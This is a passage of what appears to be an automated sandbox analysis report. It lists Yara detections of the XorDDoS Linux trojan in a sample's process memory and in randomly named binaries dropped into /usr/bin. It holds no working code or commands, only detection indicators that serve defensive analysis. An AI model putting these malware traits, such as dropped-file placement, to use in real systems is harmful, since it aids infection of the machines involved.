            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR
            Source: Yara matchFile source: /usr/bin/sosfbbrzmx, type: DROPPED
            Source: Yara matchFile source: /usr/bin/uhjkqkcgma, type: DROPPED
            Source: Yara matchFile source: /usr/bin/vnihfmehfy, type: DROPPED
            Source: Yara matchFile source: /usr/bin/oigyzaiygp, type: DROPPED
            Source: Yara matchFile source: /usr/bin/otlzwyqefc, type: DROPPED
            Source: Yara matchFile source: /usr/bin/ksagqhmoao, type: DROPPED
            Source: Yara matchFile source: /usr/bin/eqoogeqyds, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wutujskjnm, type: DROPPED
            Source: Yara matchFile source: /usr/bin/qxzsiorokf, type: DROPPED
            Source: Yara matchFile source: /usr/bin/gphlkawhxw, type: DROPPED
            Source: Yara matchFile source: /usr/bin/uzqdvpyngy, type: DROPPED
            Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
            Source: Yara matchFile source: /usr/bin/snluqxjnyb, type: DROPPED
            Source: Yara matchFile source: /usr/bin/jeyjdycnpv, type: DROPPED
            Source: Yara matchFile source: /usr/bin/bgoiqqymph, type: DROPPED
            Source: Yara matchFile source: /usr/bin/dthtwwmqvu, type: DROPPED

            System Summary

            barindex
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
